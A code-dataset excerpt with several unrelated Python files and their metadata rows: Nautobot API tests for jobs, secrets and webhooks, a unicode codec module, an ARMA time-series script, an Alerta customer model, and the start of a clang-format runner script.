"var4": device_role.pk,
}
data = {
"data": job_data,
"commit": True,
"schedule": {
"name": "test",
"interval": "future",
"start_time": str(datetime.now() + timedelta(minutes=1)),
},
}
url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.post(url, data, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
job = ScheduledJob.objects.last()
self.assertEqual(job.kwargs["data"]["var4"], str(device_role.pk))
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_job_object_var_lookup(self, mock_get_worker_count):
"""Job run requests can reference objects by their attributes."""
mock_get_worker_count.return_value = 1
self.add_permissions("extras.run_job")
device_role = DeviceRole.objects.create(name="role", slug="role")
job_data = {
"var1": "FooBar",
"var2": 123,
"var3": False,
"var4": {"name": "role"},
}
self.assertEqual(
self.TestJob.deserialize_data(job_data),
{"var1": "FooBar", "var2": 123, "var3": False, "var4": device_role},
)
url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.post(url, {"data": job_data}, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_job_future(self, mock_get_worker_count):
mock_get_worker_count.return_value = 1
self.add_permissions("extras.run_job")
d = DeviceRole.objects.create(name="role", slug="role")
data = {
"data": {"var1": "x", "var2": 1, "var3": False, "var4": d.pk},
"commit": True,
"schedule": {
"start_time": str(datetime.now() + timedelta(minutes=1)),
"interval": "future",
"name": "test",
},
}
url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.post(url, data, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_job_future_past(self, mock_get_worker_count):
mock_get_worker_count.return_value = 1
self.add_permissions("extras.run_job")
d = DeviceRole.objects.create(name="role", slug="role")
data = {
"data": {"var1": "x", "var2": 1, "var3": False, "var4": d.pk},
"commit": True,
"schedule": {
"start_time": str(datetime.now() - timedelta(minutes=1)),
"interval": "future",
"name": "test",
},
}
url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.post(url, data, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_job_interval(self, mock_get_worker_count):
mock_get_worker_count.return_value = 1
self.add_permissions("extras.run_job")
d = DeviceRole.objects.create(name="role", slug="role")
data = {
"data": {"var1": "x", "var2": 1, "var3": False, "var4": d.pk},
"commit": True,
"schedule": {
"start_time": str(datetime.now() + timedelta(minutes=1)),
"interval": "hourly",
"name": "test",
},
}
url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.post(url, data, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
@override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
def test_run_job_with_invalid_data(self):
self.add_permissions("extras.run_job")
data = {
"data": "invalid",
"commit": True,
}
url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.post(url, data, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {"errors": ["Job data needs to be a dict"]})
@override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
def test_run_job_with_wrong_data(self):
self.add_permissions("extras.run_job")
job_data = {
"var1": "FooBar",
"var2": 123,
"var3": False,
"var5": "wrong",
}
data = {
"data": job_data,
"commit": True,
}
url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.post(url, data, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {"errors": {"var5": ["Job data contained an unknown property"]}})
@override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
def test_run_job_with_missing_data(self):
self.add_permissions("extras.run_job")
job_data = {
"var1": "FooBar",
"var3": False,
}
data = {
"data": job_data,
"commit": True,
}
url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.post(url, data, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.data, {"errors": {"var2": ["This field is required."], "var4": ["This field is required."]}}
)
class JobResultTest(APITestCase):
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_delete_job_result_anonymous(self):
url = reverse("extras-api:jobresult-detail", kwargs={"pk": 1})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=[])
def test_delete_job_result_without_permission(self):
url = reverse("extras-api:jobresult-detail", kwargs={"pk": 1})
with disable_warnings("django.request"):
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=[])
def test_delete_job_result_with_permission(self):
self.add_permissions("extras.delete_jobresult")
job_result = JobResult.objects.create(
name="test",
job_id=uuid.uuid4(),
obj_type=ContentType.objects.get_for_model(GitRepository),
)
url = reverse("extras-api:jobresult-detail", kwargs={"pk": job_result.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
class JobLogEntryTest(
APIViewTestCases.GetObjectViewTestCase,
APIViewTestCases.ListObjectsViewTestCase,
):
model = JobLogEntry
brief_fields = [
"absolute_url",
"created",
"grouping",
"id",
"job_result",
"log_level",
"log_object",
"message",
"url",
]
choices_fields = []
@classmethod
def setUpTestData(cls):
cls.job_result = JobResult.objects.create(
name="test",
job_id=uuid.uuid4(),
obj_type=ContentType.objects.get_for_model(GitRepository),
)
for log_level in ("debug", "info", "success", "warning"):
JobLogEntry.objects.create(
log_level=log_level,
grouping="run",
job_result=cls.job_result,
message=f"I am a {log_level} log.",
)
def test_list_job_logs_from_job_results_detail(self):
"""Test `logs` endpoint from `JobResult` detail."""
self.add_permissions("extras.view_jobresult")
url = reverse("extras-api:jobresult-logs", kwargs={"pk": self.job_result.pk})
response = self.client.get(url, **self.header)
self.assertEqual(len(response.json()), JobLogEntry.objects.count())
def test_options_objects_returns_display_and_value(self):
"""Overridden because this test case is not applicable to this viewset."""
def test_options_returns_expected_choices(self):
"""Overridden because this test case is not applicable to this viewset."""
class ScheduledJobTest(
APIViewTestCases.GetObjectViewTestCase,
APIViewTestCases.ListObjectsViewTestCase,
):
model = ScheduledJob
brief_fields = ["interval", "name", "start_time"]
choices_fields = []
@classmethod
def setUpTestData(cls):
user = User.objects.create(username="user1", is_active=True)
ScheduledJob.objects.create(
name="test1",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_IMMEDIATELY,
user=user,
approval_required=True,
start_time=now(),
)
ScheduledJob.objects.create(
name="test2",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_IMMEDIATELY,
user=user,
approval_required=True,
start_time=now(),
)
ScheduledJob.objects.create(
name="test3",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_IMMEDIATELY,
user=user,
approval_required=True,
start_time=now(),
)
def test_options_objects_returns_display_and_value(self):
"""Overriden because this test case is not applicable to this viewset"""
def test_options_returns_expected_choices(self):
"""Overriden because this test case is not applicable to this viewset"""
class JobApprovalTest(APITestCase):
@classmethod
def setUpTestData(cls):
user = User.objects.create(username="user1", is_active=True)
cls.scheduled_job = ScheduledJob.objects.create(
name="test",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_IMMEDIATELY,
user=user,
approval_required=True,
start_time=now(),
)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job_anonymous(self):
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": 1})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job_without_permission(self):
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": 1})
with disable_warnings("django.request"):
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job_same_user(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
scheduled_job = ScheduledJob.objects.create(
name="test",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_IMMEDIATELY,
user=self.user,
approval_required=True,
start_time=now(),
)
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": scheduled_job.pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": self.scheduled_job.pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job_in_past(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
user = User.objects.get(username="user1")
scheduled_job = ScheduledJob.objects.create(
name="test",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_FUTURE,
one_off=True,
user=user,
approval_required=True,
start_time=now(),
)
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": scheduled_job.pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job_in_past_force(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
user = User.objects.get(username="user1")
scheduled_job = ScheduledJob.objects.create(
name="test",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_FUTURE,
one_off=True,
user=user,
approval_required=True,
start_time=now(),
)
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": scheduled_job.pk})
response = self.client.post(url + "?force=true", **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_deny_job_without_permission(self):
url = reverse("extras-api:scheduledjob-deny", kwargs={"pk": 1})
with disable_warnings("django.request"):
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_deny_job(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
url = reverse("extras-api:scheduledjob-deny", kwargs={"pk": self.scheduled_job.pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertIsNone(ScheduledJob.objects.filter(pk=self.scheduled_job.pk).first())
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_dry_run_job_without_permission(self):
url = reverse("extras-api:scheduledjob-dry-run", kwargs={"pk": 1})
with disable_warnings("django.request"):
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_dry_run_job(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
url = reverse("extras-api:scheduledjob-deny", kwargs={"pk": self.scheduled_job.pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
class RelationshipTest(APIViewTestCases.APIViewTestCase):
model = Relationship
brief_fields = ["display", "id", "name", "slug", "url"]
create_data = [
{
"name": "Device VLANs",
"slug": "device-vlans",
"type": "many-to-many",
"source_type": "ipam.vlan",
"destination_type": "dcim.device",
},
{
"name": "Primary VLAN",
"slug": "primary-vlan",
"type": "one-to-many",
"source_type": "ipam.vlan",
"destination_type": "dcim.device",
},
{
"name": "Primary Interface",
"slug": "primary-interface",
"type": "one-to-one",
"source_type": "dcim.device",
"source_label": "primary interface",
"destination_type": "dcim.interface",
"destination_hidden": True,
},
{
"name": "Relationship 1",
"type": "one-to-one",
"source_type": "dcim.device",
"source_label": "primary interface",
"destination_type": "dcim.interface",
"destination_hidden": True,
},
]
bulk_update_data = {
"destination_filter": {"role": {"slug": "controller"}},
}
choices_fields = ["destination_type", "source_type", "type"]
slug_source = "name"
@classmethod
def setUpTestData(cls):
site_type = ContentType.objects.get_for_model(Site)
device_type = ContentType.objects.get_for_model(Device)
Relationship(
name="Related Sites",
slug="related-sites",
type="many-to-many",
source_type=site_type,
destination_type=site_type,
).validated_save()
Relationship(
name="Unrelated Sites",
slug="unrelated-sites",
type="many-to-many",
source_type=site_type,
destination_type=site_type,
).validated_save()
Relationship(
name="Devices found elsewhere",
slug="devices-elsewhere",
type="many-to-many",
source_type=site_type,
destination_type=device_type,
).validated_save()
class RelationshipAssociationTest(APIViewTestCases.APIViewTestCase):
model = RelationshipAssociation
brief_fields = ["destination_id", "display", "id", "relationship", "source_id", "url"]
choices_fields = ["destination_type", "source_type"]
@classmethod
def setUpTestData(cls):
site_type = ContentType.objects.get_for_model(Site)
device_type = ContentType.objects.get_for_model(Device)
cls.relationship = Relationship(
name="Devices found elsewhere",
slug="elsewhere-devices",
type="many-to-many",
source_type=site_type,
destination_type=device_type,
)
cls.relationship.validated_save()
cls.sites = (
Site.objects.create(name="Empty Site", slug="empty"),
Site.objects.create(name="Occupied Site", slug="occupied"),
Site.objects.create(name="Another Empty Site", slug="another-empty"),
)
manufacturer = Manufacturer.objects.create(name="Manufacturer 1", slug="manufacturer-1")
devicetype = DeviceType.objects.create(manufacturer=manufacturer, model="Device Type 1", slug="device-type-1")
devicerole = DeviceRole.objects.create(name="Device Role 1", slug="device-role-1")
cls.devices = (
Device.objects.create(name="Device 1", device_type=devicetype, device_role=devicerole, site=cls.sites[1]),
Device.objects.create(name="Device 2", device_type=devicetype, device_role=devicerole, site=cls.sites[1]),
Device.objects.create(name="Device 3", device_type=devicetype, device_role=devicerole, site=cls.sites[1]),
)
RelationshipAssociation(
relationship=cls.relationship,
source_type=site_type,
source_id=cls.sites[0].pk,
destination_type=device_type,
destination_id=cls.devices[0].pk,
).validated_save()
RelationshipAssociation(
relationship=cls.relationship,
source_type=site_type,
source_id=cls.sites[0].pk,
destination_type=device_type,
destination_id=cls.devices[1].pk,
).validated_save()
RelationshipAssociation(
relationship=cls.relationship,
source_type=site_type,
source_id=cls.sites[0].pk,
destination_type=device_type,
destination_id=cls.devices[2].pk,
).validated_save()
cls.create_data = [
{
"relationship": cls.relationship.pk,
"source_type": "dcim.site",
"source_id": cls.sites[2].pk,
"destination_type": "dcim.device",
"destination_id": cls.devices[0].pk,
},
{
"relationship": cls.relationship.pk,
"source_type": "dcim.site",
"source_id": cls.sites[2].pk,
"destination_type": "dcim.device",
"destination_id": cls.devices[1].pk,
},
{
"relationship": cls.relationship.pk,
"source_type": "dcim.site",
"source_id": cls.sites[2].pk,
"destination_type": "dcim.device",
"destination_id": cls.devices[2].pk,
},
]
class SecretTest(APIViewTestCases.APIViewTestCase):
model = Secret
brief_fields = ["display", "id", "name", "slug", "url"]
bulk_update_data = {}
create_data = [
{
"name": "NAPALM Username",
"provider": "environment-variable",
"description": "Username for all NAPALM devices",
"parameters": {
"variable": "NAPALM_USERNAME",
},
},
{
"name": "NAPALM Password",
"provider": "environment-variable",
"parameters": {
"variable": "NAPALM_PASSWORD",
},
},
{
"name": "GitHub Token for My Repository",
"slug": "github-token-my-repository",
"provider": "text-file",
"parameters": {
"path": "/github-tokens/user/myusername.txt",
},
},
]
slug_source = "name"
@classmethod
def setUpTestData(cls):
secrets = (
Secret(
name="api-test-1",
provider="environment-variable",
parameters={"variable": "API_TEST_1"},
),
Secret(
name="api-test-2",
provider="environment-variable",
parameters={"variable": "API_TEST_2"},
),
Secret(
name="api-test-3",
provider="environment-variable",
parameters={"variable": "API_TEST_3"},
),
)
for secret in secrets:
secret.validated_save()
class SecretsGroupTest(APIViewTestCases.APIViewTestCase):
model = SecretsGroup
brief_fields = ["display", "id", "name", "slug", "url"]
bulk_update_data = {}
slug_source = "name"
@classmethod
def setUpTestData(cls):
secrets = (
Secret.objects.create(
name="secret-1", provider="environment-variable", parameters={"variable": "SOME_VAR"}
),
Secret.objects.create(
name="secret-2", provider="environment-variable", parameters={"variable": "ANOTHER_VAR"}
),
)
secrets_groups = (
SecretsGroup.objects.create(name="Group A", slug="group-a"),
SecretsGroup.objects.create(name="Group B", slug="group-b"),
SecretsGroup.objects.create(name="Group C", slug="group-c", description="Some group"),
)
SecretsGroupAssociation.objects.create(
secret=secrets[0],
group=secrets_groups[0],
access_type=SecretsGroupAccessTypeChoices.TYPE_GENERIC,
secret_type=SecretsGroupSecretTypeChoices.TYPE_SECRET,
)
SecretsGroupAssociation.objects.create(
secret=secrets[1],
group=secrets_groups[1],
access_type=SecretsGroupAccessTypeChoices.TYPE_GENERIC,
secret_type=SecretsGroupSecretTypeChoices.TYPE_SECRET,
)
cls.create_data = [
{
"name": "Secrets Group 1",
"slug": "secrets-group-1",
"description": "First Secrets Group",
},
{
"name": "Secrets Group 2",
"description": "Second Secrets Group",
},
{
"name": "Secrets Group 3",
"description": "Third Secrets Group",
},
]
class SecretsGroupAssociationTest(APIViewTestCases.APIViewTestCase):
model = SecretsGroupAssociation
brief_fields = ["access_type", "display", "id", "secret", "secret_type", "url"]
bulk_update_data = {}
choices_fields = ["access_type", "secret_type"]
@classmethod
def setUpTestData(cls):
secrets = (
Secret.objects.create(
name="secret-1", provider="environment-variable", parameters={"variable": "SOME_VAR"}
),
Secret.objects.create(
name="secret-2", provider="environment-variable", parameters={"variable": "ANOTHER_VAR"}
),
Secret.objects.create(
name="secret-3", provider="environment-variable", parameters={"variable": "YET_ANOTHER"}
),
)
secrets_groups = (
SecretsGroup.objects.create(name="Group A", slug="group-a"),
SecretsGroup.objects.create(name="Group B", slug="group-b"),
SecretsGroup.objects.create(name="Group C", slug="group-c", description="Some group"),
)
SecretsGroupAssociation.objects.create(
secret=secrets[0],
group=secrets_groups[0],
access_type=SecretsGroupAccessTypeChoices.TYPE_GENERIC,
secret_type=SecretsGroupSecretTypeChoices.TYPE_SECRET,
)
SecretsGroupAssociation.objects.create(
secret=secrets[1],
group=secrets_groups[1],
access_type=SecretsGroupAccessTypeChoices.TYPE_GENERIC,
secret_type=SecretsGroupSecretTypeChoices.TYPE_SECRET,
)
SecretsGroupAssociation.objects.create(
secret=secrets[2],
group=secrets_groups[2],
access_type=SecretsGroupAccessTypeChoices.TYPE_GENERIC,
secret_type=SecretsGroupSecretTypeChoices.TYPE_SECRET,
)
cls.create_data = [
{
"group": secrets_groups[0].pk,
"access_type": SecretsGroupAccessTypeChoices.TYPE_SSH,
"secret_type": SecretsGroupSecretTypeChoices.TYPE_USERNAME,
"secret": secrets[0].pk,
},
{
"group": secrets_groups[1].pk,
"access_type": SecretsGroupAccessTypeChoices.TYPE_SSH,
"secret_type": SecretsGroupSecretTypeChoices.TYPE_USERNAME,
"secret": secrets[1].pk,
},
{
"group": secrets_groups[2].pk,
"access_type": SecretsGroupAccessTypeChoices.TYPE_SSH,
"secret_type": SecretsGroupSecretTypeChoices.TYPE_USERNAME,
"secret": secrets[2].pk,
},
]
class StatusTest(APIViewTestCases.APIViewTestCase):
model = Status
brief_fields = ["display", "id", "name", "slug", "url"]
bulk_update_data = {
"color": "000000",
}
create_data = [
{
"name": "Pizza",
"slug": "pizza",
"color": "0000ff",
"content_types": ["dcim.device", "dcim.rack"],
},
{
"name": "Oysters",
"slug": "oysters",
"color": "00ff00",
"content_types": ["ipam.ipaddress", "ipam.prefix"],
},
{
"name": "Bad combinations",
"slug": "bad-combinations",
"color": "ff0000",
"content_types": ["dcim.device"],
},
{
"name": "Status 1",
"color": "ff0000",
"content_types": ["dcim.device"],
},
]
slug_source = "name"
@classmethod
def setUpTestData(cls):
"""
Since many `Status` objects are created as part of data migrations, we're
testing against those. If this seems magical, it's because they are
imported from `ChoiceSet` enum objects.
This method is defined just so it's clear that there is no need to
create test data for this test case.
See `extras.management.create_custom_statuses` for context.
"""
class TagTest(APIViewTestCases.APIViewTestCase):
model = Tag
brief_fields = ["color", "display", "id", "name", "slug", "url"]
create_data = [
{
"name": "Tag 4",
"slug": "tag-4",
},
{
"name": "Tag 5",
"slug": "tag-5",
},
{
"name": "Tag 6",
"slug": "tag-6",
},
]
bulk_update_data = {
"description": "New description",
}
@classmethod
def setUpTestData(cls):
Tag.objects.create(name="Tag 1", slug="tag-1")
Tag.objects.create(name="Tag 2", slug="tag-2")
Tag.objects.create(name="Tag 3", slug="tag-3")
class WebhookTest(APIViewTestCases.APIViewTestCase):
model = Webhook
brief_fields = ["display", "id", "name", "url"]
create_data = [
{
"content_types": ["dcim.consoleport"],
"name": "api-test-4",
"type_create": True,
"payload_url": "http://api-test-4.com/test4",
"http_method": "POST",
"http_content_type": "application/json",
"ssl_verification": True,
},
{
"content_types": ["dcim.consoleport"],
"name": "api-test-5",
"type_update": True,
"payload_url": "http://api-test-5.com/test5",
"http_method": "POST",
"http_content_type": "application/json",
"ssl_verification": True,
},
{
"content_types": ["dcim.consoleport"],
"name": "api-test-6",
"type_delete": True,
"payload_url": "http://api-test-6.com/test6",
"http_method": "POST",
"http_content_type": "application/json",
"ssl_verification": True,
},
]
choices_fields = ["http_method"]
@classmethod
def setUpTestData(cls):
webhooks = (
Webhook(
name="api-test-1",
type_create=True,
payload_url="http://api-test-1.com/test1",
http_method="POST",
http_content_type="application/json",
ssl_verification=True,
),
Webhook(
name="api-test-2",
type_update=True,
payload_url="http://api-test-2.com/test2",
http_method="POST",
http_content_type="application/json",
ssl_verification=True,
),
Webhook(
name="api-test-3",
type_delete=True,
payload_url="http://api-test-3.com/test3",
http_method="POST",
http_content_type="application/json",
ssl_verification=True,
),
)
obj_type = ContentType.objects.get_for_model(DeviceType)
for webhook in webhooks:
webhook.save()
webhook.content_types.set([obj_type])
| 35.976433
| 120
| 0.58912
|
4a0f4c13e4d1479ae2cb5ca657706ade8173fe51
| 650
|
py
|
Python
|
Lib/encodings/unicode_internal.py
|
M-Spencer-94/configNOW
|
56828587253202089e77cfdfcf5329f2a7f09b3f
|
[
"PSF-2.0",
"Apache-2.0",
"MIT"
] | 8
|
2016-11-24T09:38:31.000Z
|
2021-04-23T13:04:48.000Z
|
core/Lib/encodings/unicode_internal.py
|
tuankien2601/python222
|
205414c33fba8166167fd8a6a03eda1a68f16316
|
[
"Apache-2.0"
] | 6
|
2020-11-18T15:48:14.000Z
|
2021-05-03T21:20:50.000Z
|
core/Lib/encodings/unicode_internal.py
|
tuankien2601/python222
|
205414c33fba8166167fd8a6a03eda1a68f16316
|
[
"Apache-2.0"
] | 4
|
2015-09-09T11:54:37.000Z
|
2018-05-26T05:08:14.000Z
|
""" Python 'unicode-internal' Codec
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import codecs
### Codec APIs
class Codec(codecs.Codec):
# Note: Binding these as C functions will result in the class not
# converting them to methods. This is intended.
encode = codecs.unicode_internal_encode
decode = codecs.unicode_internal_decode
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return (Codec.encode,Codec.decode,StreamReader,StreamWriter)
| 20.967742
| 69
| 0.733846
|
4a0f4df4a720560a00cbe68ec6c2c66329bf14d0
| 1,555
|
py
|
Python
|
time series regression/ARIMA/ARMA.py
|
Diyago/ML-DL-scripts
|
40718a9d4318d6d6531bcea5998c0a18afcd9cb3
|
[
"Apache-2.0"
] | 142
|
2018-09-02T08:59:45.000Z
|
2022-03-30T17:08:24.000Z
|
time series regression/ARIMA/ARMA.py
|
jerinka/ML-DL-scripts
|
eeb5c3c7c5841eb4cdb272690e14d6718f3685b2
|
[
"Apache-2.0"
] | 4
|
2019-09-08T07:27:11.000Z
|
2021-10-19T05:50:24.000Z
|
time series regression/ARIMA/ARMA.py
|
jerinka/ML-DL-scripts
|
eeb5c3c7c5841eb4cdb272690e14d6718f3685b2
|
[
"Apache-2.0"
] | 75
|
2018-10-04T17:08:40.000Z
|
2022-03-08T18:50:52.000Z
|
# Load modules
from __future__ import print_function
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
import statsmodels.tsa.api as smtsa
from statsmodels.tsa import arima_process
# Function to plot signal, ACF and PACF
def plotds(xt, nlag=30, fig_size=(12, 10)):
if not isinstance(xt, pd.Series):
xt = pd.Series(xt)
plt.figure(figsize=fig_size)
layout = (2, 2)
# Assign axes
ax_xt = plt.subplot2grid(layout, (0, 0), colspan=2)
ax_acf = plt.subplot2grid(layout, (1, 0))
ax_pacf = plt.subplot2grid(layout, (1, 1))
# Plot graphs
xt.plot(ax=ax_xt)
ax_xt.set_title("Time Series")
plot_acf(xt, lags=50, ax=ax_acf)
plot_pacf(xt, lags=50, ax=ax_pacf)
plt.tight_layout()
return None
# Number of samples
n = 600
# Generate AR(1) dataset
ar = np.r_[1, 0.6]
ma = np.r_[1, 0.3]
ar1ma1_data = smtsa.arma_generate_sample(ar=ar, ma=ma, nsample=n)
plotds(ar1ma1_data)
# Impluse response curve
plt.plot(arima_process.arma_impulse_response(ar, ma, nobs=20))
plt.ylabel("Impact")
plt.xlabel("Lag")
# Build AR(1) model
ar1ma1 = smtsa.ARMA(ar1ma1_data.tolist(), order=(1, 1)).fit(
maxlag=30, method="mle", trend="nc"
)
ar1ma1.summary()
# Optimize ARMA parameters
aicVal = []
for ari in range(1, 3):
for maj in range(1, 3):
arma_obj = smtsa.ARMA(ar1ma1_data.tolist(), order=(ari, maj)).fit(
maxlag=30, method="mle", trend="nc"
)
aicVal.append([ari, maj, arma_obj.aic])
| 25.491803
| 74
| 0.6791
|
4a0f4ed9d17911771d64219727c7b860e772bd21
| 2,439
|
py
|
Python
|
alerta/models/customer.py
|
sauber/alerta
|
312abf1cd02aebbcb7db972f3e0cdaaf62bbbb8a
|
[
"Apache-2.0"
] | null | null | null |
alerta/models/customer.py
|
sauber/alerta
|
312abf1cd02aebbcb7db972f3e0cdaaf62bbbb8a
|
[
"Apache-2.0"
] | null | null | null |
alerta/models/customer.py
|
sauber/alerta
|
312abf1cd02aebbcb7db972f3e0cdaaf62bbbb8a
|
[
"Apache-2.0"
] | 1
|
2021-03-11T18:19:22.000Z
|
2021-03-11T18:19:22.000Z
|
from typing import Any, Dict, List, Optional, Tuple, Union
from uuid import uuid4
from alerta.app import db
from alerta.database.base import Query
from alerta.utils.response import absolute_url
JSON = Dict[str, Any]
class Customer:
def __init__(self, match: str, customer: str, **kwargs) -> None:
self.id = kwargs.get('id', str(uuid4()))
self.match = match
self.customer = customer
@classmethod
def parse(cls, json: JSON) -> 'Customer':
return Customer(
match=json.get('match', None),
customer=json.get('customer', None)
)
@property
def serialize(self) -> Dict[str, Any]:
return {
'id': self.id,
'href': absolute_url('/customer/' + self.id),
'match': self.match,
'customer': self.customer
}
def __repr__(self) -> str:
return 'Customer(id={!r}, match={!r}, customer={!r})'.format(
self.id, self.match, self.customer)
@classmethod
def from_document(cls, doc: Dict[str, Any]) -> 'Customer':
return Customer(
id=doc.get('id', None) or doc.get('_id'),
match=doc.get('match', None),
customer=doc.get('customer', None)
)
@classmethod
def from_record(cls, rec) -> 'Customer':
return Customer(
id=rec.id,
match=rec.match,
customer=rec.customer
)
@classmethod
def from_db(cls, r: Union[Dict, Tuple]) -> 'Customer':
if isinstance(r, dict):
return cls.from_document(r)
elif isinstance(r, tuple):
return cls.from_record(r)
def create(self) -> 'Customer':
return Customer.from_db(db.create_customer(self))
@staticmethod
def find_by_id(id: str) -> Optional['Customer']:
return Customer.from_db(db.get_customer(id))
@staticmethod
def find_all(query: Query=None) -> List['Customer']:
return [Customer.from_db(customer) for customer in db.get_customers(query)]
def update(self, **kwargs) -> 'Customer':
return Customer.from_db(db.update_customer(self.id, **kwargs))
def delete(self) -> bool:
return db.delete_customer(self.id)
@classmethod
def lookup(cls, login: str, groups: List[str]) -> List[str]:
customers = db.get_customers_by_match(login, matches=groups)
return customers if customers != '*' else []
| 29.385542
| 83
| 0.595326
|
4a0f4f802dd6c6ca83d97d153d111d4e6a9850be
| 3,750
|
py
|
Python
|
pi4home-core/travis/run-clang-format.py
|
khzd/pi4home
|
937bcdcf77bab111cca10af1fe45c63a55c29aae
|
[
"MIT"
] | 1
|
2019-05-16T02:52:12.000Z
|
2019-05-16T02:52:12.000Z
|
pi4home-core/travis/run-clang-format.py
|
khzd/pi4home
|
937bcdcf77bab111cca10af1fe45c63a55c29aae
|
[
"MIT"
] | null | null | null |
pi4home-core/travis/run-clang-format.py
|
khzd/pi4home
|
937bcdcf77bab111cca10af1fe45c63a55c29aae
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
import argparse
import click
import glob
import json
import multiprocessing
import os
import fnmatch
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import traceback
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
HEADER_FILTER = r'^.*/src/pi4home/.*'
def make_absolute(f, directory):
if os.path.isabs(f):
